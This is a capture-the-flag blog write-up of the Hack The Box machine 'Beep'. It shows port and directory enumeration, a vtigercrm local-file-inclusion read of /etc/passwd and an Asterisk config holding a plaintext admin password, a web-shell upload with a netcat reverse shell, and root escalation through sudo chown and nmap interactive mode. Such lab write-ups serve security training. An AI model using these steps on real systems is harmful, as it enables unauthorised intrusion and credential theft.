Syrion

Penetration Testing And CTF Blog

Beep Writeup

Jan 7, 2018 • hackthebox

Hello,

this is my first writeup for Hack The Box platform, the machine was Beep.

Let’s run nmap to see which services are running on the machine:

root@kali:~# nmap -sT -sV -p 1-65535 10.10.10.7 -A

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 12:27 EST
Nmap scan report for beep.localdomain (10.10.10.7)
Host is up (0.087s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
746/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

There were a lot of services.

On port 443 there was Apache with elastix:

Screenshot

By using dirsearch I enumerated it’s directories:

root@kali:/usr/share/wordlists/SecLists/Discovery/Web_Content# dirsearch -u https://10.10.10.7/ -w raft-medium-directories.txt -e php,txt

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php, txt | Threads: 10 | Wordlist size: 30005

Error Log: /opt/dirsearch/logs/errors-18-01-08_15-16-00.log

Target: https://10.10.10.7/

[15:16:01] Starting: 
[15:16:02] 301 -  309B  - /admin  ->  https://10.10.10.7/admin/
[15:16:02] 301 -  310B  - /images  ->  https://10.10.10.7/images/
[15:16:02] 301 -  311B  - /modules  ->  https://10.10.10.7/modules/
[15:16:02] 301 -  310B  - /themes  ->  https://10.10.10.7/themes/
[15:16:03] 301 -  308B  - /help  ->  https://10.10.10.7/help/
[15:16:05] 301 -  307B  - /var  ->  https://10.10.10.7/var/
[15:16:05] 301 -  308B  - /mail  ->  https://10.10.10.7/mail/
[15:16:06] 301 -  310B  - /static  ->  https://10.10.10.7/static/
[15:16:07] 301 -  308B  - /lang  ->  https://10.10.10.7/lang/
[15:16:10] 301 -  308B  - /libs  ->  https://10.10.10.7/libs/
[15:16:19] 301 -  309B  - /panel  ->  https://10.10.10.7/panel/
[15:16:58] 301 -  311B  - /configs  ->  https://10.10.10.7/configs/
[15:23:39] 301 -  314B  - /recordings  ->  https://10.10.10.7/recordings/
[15:26:38] 301 -  313B  - /vtigercrm  ->  https://10.10.10.7/vtigercrm/
[15:26:42] 200 -    2KB - /

I found vtigercrm 5.1.0:

Screenshot

This version is vulnerable to LFI. With goWAPT I enumerated all the files:

Screenshot

In the /etc/passwd file we can see the user Fanis:

Screenshot

After some research on google about asterisk, I got the etc/asterisk/manager.conf file:

;
; AMI - Asterisk Manager interface
;
; FreePBX needs this to be enabled. Note that if you enable it on a different IP, you need
; to assure that this can't be reached from un-authorized hosts with the ACL settings (permit/deny).
; Also, remember to configure non-default port or IP-addresses in amportal.conf.
; 
; The AMI connection is used both by the portal and the operator's panel in FreePBX.
;
; FreePBX assumes an AMI connection to localhost:5038 by default.
;
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0
displayconnects=no ;only effects 1.6+

[admin]
secret = jEhdIekWmdjE
deny=0.0.0.0/0.0.0.0
permit=127.0.0.1/255.255.255.0
read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate

#include manager_additional.conf
#include manager_custom.conf

I used the credential admin:jEhdIekWmdjE contained in this file to log in Elastix, Vtigercrm and FreePBX.

After some research on Google, I was able to upload a backdoor by using this vulnerability in vtiger crm:

Screenshot

With python I got a reverse shell and the user flag:

root@kali:~/Desktop/webshell# nc -lvp 80
listening on [any] 80 ...
connect to [10.10.14.6] from beep.localdomain [10.10.10.7] 46497
sh: no job control in this shell
sh-3.2$ ls
logo.txt
sale.jpeg
vtiger-crm-logo.jpg
webshell.php
sh-3.2$ python -c "import pty;pty.spawn('/bin/bash')"
bash-3.2$ cat /home/fanis/user.txt
cat /home/fanis/user.txt

There were different ways to get the root flag:

bash-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
bash-3.2$ sudo /bin/chown -r asterisk /root
sudo /bin/chown -r asterisk /root
/bin/chown: invalid option -- r
Try `/bin/chown --help' for more information.
bash-3.2$ sudo /bin/chown -R asterisk /root
sudo /bin/chown -R asterisk /root
bash-3.2$ cat /root/root.txt
cat /root/root.txt
bash-3.2$ sudo nmap --interactive
sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !id
!id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
waiting to reap child: No child processes (10)
nmap>

Bye!!!